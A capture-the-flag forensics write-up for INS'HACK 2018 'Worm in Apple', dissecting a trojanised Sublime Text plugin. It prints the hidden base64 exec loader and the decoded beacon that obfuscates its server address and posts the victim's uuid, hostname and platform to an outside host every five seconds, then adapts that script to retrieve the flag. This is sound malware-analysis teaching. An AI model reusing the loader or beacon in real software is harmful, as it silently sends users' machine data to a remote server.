Writeup: INS'HACK 2018 - Worm in Apple

Information

  • Category: forensics

Description

A guy I met on the Internet wanted me to test his new ST3 plugin.

I have a bad feeling about this…

Maybe you can tell me if I’m right to be worried?

Investigate as far as you can.

challenge file

Writeup

The challenge was pretty simple but neat.

First of all we need to extract all the files from the package:

unzip DoxyDoxygen.sublime-package

Lots of files will appear, but the interesting one is Doxy.py, which contains:

try:
    import base64;A=b'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';exec(base64.b64decode(A));
except:
    pass

Decoding the payload leads us to:

#       /!\ FOR EDUCATIONAL PURPOSE ONLY /!\
A = '7.2zbv-bn00yrcp4scv-3rp52v49bv-3ncs2'
B = 443
C = '0123456789abcdefghijklmnopqrstuvwxyz-.'
import time
import requests
import platform
from uuid import uuid4
from threading import Thread


def w():
    # domain: every char of A shifted back by 13 in the 38-char alphabet C
    # path:   each byte XORed with 0x42
    i, u = str(uuid4()), 'https://{}:{}/{}'.format(''.join([
        C[(C.index(e) - 0x0d) % len(C)] for e in A
    ]), B, ''.join([chr(e ^ 0x42) for e in [44, 45, 54, 43, 36, 59]]))
    # beacon forever: uuid, hostname and platform string every 5 seconds
    while True:
        requests.post(
            u,
            json={
                'uuid': i,
                'node': platform.node(),
                'platform': platform.platform()
            })
        time.sleep(5)


t = Thread(target=w)
if __name__ == '__main__':
    t.start()
    t.join()
else:
    # when imported as a plugin, keep beaconing in a background thread
    t.daemon = True
    t.start()

The code will POST our machine-generated uuid, hostname and kernel version to https://worm-in-apple.ctf.insecurity-insa.fr:443/notify every 5 seconds.

Why not just open the URL in a browser?

The root https://worm-in-apple.ctf.insecurity-insa.fr/ shows some nice ASCII art:

but the interesting part is in the page source:

<!-- [yo! dev! remove me! or not...]
LyAgICAgICAgLT4geW91J3JlIGxvb2tpbicgYXQgaXQKICAgICAgICAgICAgL25vd
GlmeSAgLT4gdGhlIGJlYWNvbiBlbmRwb2ludAogICAgICAgICAgICAvZmxhZyAgIC
AtPiB0aGUgZmxhZyBlbnBvaW50Li4uIGJ1dCBkb24ndCBnZXQgdG8gY29ja3kgdGh
lcmUKICAgICAgICAgICAgICAgICAgICAgICAgYXJlIHNvbWUgcmVxdWlyZW1lbnRz
Lg==
-->

which decodes to:

/        -> you're lookin' at it
/notify -> the beacon endpoint
/flag -> the flag enpoint... but don't get to cocky there
are some requirements.

Opening the URL https://worm-in-apple.ctf.insecurity-insa.fr/flag?uuid=f32a17aa-6063-48ab-9ed8-aa95c71800e1 is a dead end:

your cookie missing or maybe you don't know what HMAC means :(

Probably the backend service uses the victim's uuid to generate a cookie with an HMAC.

So why not adapt the original script to check whether /notify sets a cookie, and then use that cookie to request the flag?

#       /!\ FOR EDUCATIONAL PURPOSE ONLY /!\
A = '7.2zbv-bn00yrcp4scv-3rp52v49bv-3ncs2'
B = 443
C = '0123456789abcdefghijklmnopqrstuvwxyz-.'
import requests
from uuid import uuid4


def w():
    i, u = str(uuid4()), 'https://{}:{}/{}'.format(''.join([
        C[(C.index(e) - 0x0d) % len(C)] for e in A
    ]), B, ''.join([chr(e ^ 0x42) for e in [44, 45, 54, 43, 36, 59]]))
    # a Session keeps the cookie set by /notify for the following /flag request
    session = requests.Session()
    r = session.post(
        u,
        json={
            'uuid': i,
            'node': "givemeflag",
            'platform': "sameasabove"
        })
    print(r.cookies)
    r = session.get(u.replace("notify", "flag"), params={'uuid': i})
    print(r.url)
    print(r.text)


w()

Running the above snippet will get us the flag!

<RequestsCookieJar[<Cookie uuid="2|1:0|10:1523093557|4:uuid|68:NWU5YmM0NjItZGEwOC00NTI5LTgyMzQtNjUzYWEzZmMxY2I1WzEwLjQyLjgxLjU3XQ==|9b3c23650e9ed9233c67b4ef572cf8ec9634f282b2a8263624b9a562bd428f94" for worm-in-apple.ctf.insecurity-insa.fr/>]>
https://worm-in-apple.ctf.insecurity-insa.fr:443/flag?uuid=5e9bc462-da08-4529-8234-653aa3fc1cb5
here is your reward my dear: INSA{30880b4d7e6726f5614eb57d0c6d9e7aa23e9cbbae89a6c91aebb9d0352bc53b}
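As an added example (not part of the original writeup), the cookie that /notify returned can be taken apart to see what the HMAC actually covers. I assume the layout 2|1:0|10:<ts>|4:uuid|68:<b64>|<hex> is Tornado's v2 signed-value format, where the last field is an HMAC-SHA256 over everything up to and including the final "|"; the server secret is not on the page, so signing is only shown with a constructed placeholder secret.

```python
# Added example, not from the original writeup: dissect the signed cookie
# that /notify set. Assumption: "2|1:0|10:<ts>|4:uuid|68:<b64>|<hex>" is the
# Tornado v2 signed-value layout, i.e. HMAC-SHA256 over everything up to and
# including the last '|'. The real server secret is unknown, so signing is
# demonstrated with a constructed placeholder secret only.
import base64
import hashlib
import hmac

# Cookie value captured in the writeup's output above.
COOKIE = ("2|1:0|10:1523093557|4:uuid|68:NWU5YmM0NjItZGEwOC00NTI5LTgyMzQt"
          "NjUzYWEzZmMxY2I1WzEwLjQyLjgxLjU3XQ==|9b3c23650e9ed9233c67b4ef572c"
          "f8ec9634f282b2a8263624b9a562bd428f94")


def parse_signed_cookie(cookie):
    """Split the cookie into its fields, checking every length prefix."""
    version, key_version, timestamp, name, value, signature = cookie.split("|")
    if version != "2":
        raise ValueError("unexpected format version %r" % version)
    fields = {}
    for label, field in (("key_version", key_version), ("timestamp", timestamp),
                         ("name", name), ("value", value)):
        length, _, data = field.partition(":")
        if int(length) != len(data):
            raise ValueError("length prefix mismatch in %s" % label)
        fields[label] = data
    # The base64 payload is the uuid we sent plus the source IP the server saw,
    # so the cookie binds the uuid to the beaconing host.
    fields["value"] = base64.b64decode(fields["value"]).decode()
    fields["signature"] = signature
    fields["signed_data"] = cookie[:cookie.rfind("|") + 1]
    return fields


def sign(signed_data, secret):
    """HMAC-SHA256 hex digest as used by the assumed Tornado v2 layout."""
    return hmac.new(secret.encode(), signed_data.encode(), hashlib.sha256).hexdigest()


def verify(cookie, secret):
    """True only if the signature matches under the given secret."""
    fields = parse_signed_cookie(cookie)
    return hmac.compare_digest(sign(fields["signed_data"], secret), fields["signature"])


if __name__ == "__main__":
    parsed = parse_signed_cookie(COOKIE)
    print(parsed["value"])                       # uuid[client-ip]
    print(verify(COOKIE, "placeholder-secret"))  # False: we do not hold the server's key
```

The decoded value shows why a bare GET on /flag fails: the uuid is tied to the client IP that beaconed and the whole thing is integrity-protected, so only the host that ran the plugin gets a valid cookie.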

Flag

INSA{30880b4d7e6726f5614eb57d0c6d9e7aa23e9cbbae89a6c91aebb9d0352bc53b}